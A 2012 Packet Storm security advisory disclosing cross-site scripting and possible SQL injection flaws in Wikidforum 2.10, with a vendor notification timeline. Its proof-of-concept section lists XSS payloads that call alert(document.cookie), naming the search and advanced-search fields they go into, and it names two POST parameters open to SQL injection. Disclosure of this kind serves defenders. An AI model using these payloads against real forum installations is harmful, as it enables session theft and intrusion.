Wikidforum 2.10 Cross Site Scripting / SQL Injection

2012-03-12T00:00:00
ID PACKETSTORM:110697
Type packetstorm
Reporter Stefan Schurtz
Modified 2012-03-12T00:00:00

Description

                                        
                                            `Advisory: Wikidforum 2.10 Multiple security vulnerabilities  
Advisory ID: SSCHADV2012-005  
Author: Stefan Schurtz  
Affected Software: Successfully tested on Wikidforum 2.10  
Vendor URL: http://www.wikidforum.com/  
Vendor Status: informed  
  
==========================  
Vulnerability Description  
==========================  
  
Wikidforum 2.10 is prone to multiple XSS and SQL-Injection vulnerabilities  
  
==================  
PoC-Exploit  
==================  
  
// xss  
Search-Field -> '"</script><script>alert(document.cookie)</script>  
Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script>  
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)>  
  
// possible SQL-Injection  
  
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection]  
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]  
  
=========  
Solution  
=========  
  
-  
  
====================  
Disclosure Timeline  
====================  
  
19-Feb-2012 - vendor informed  
10-Mar-2012 - no response from vendor  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt  
`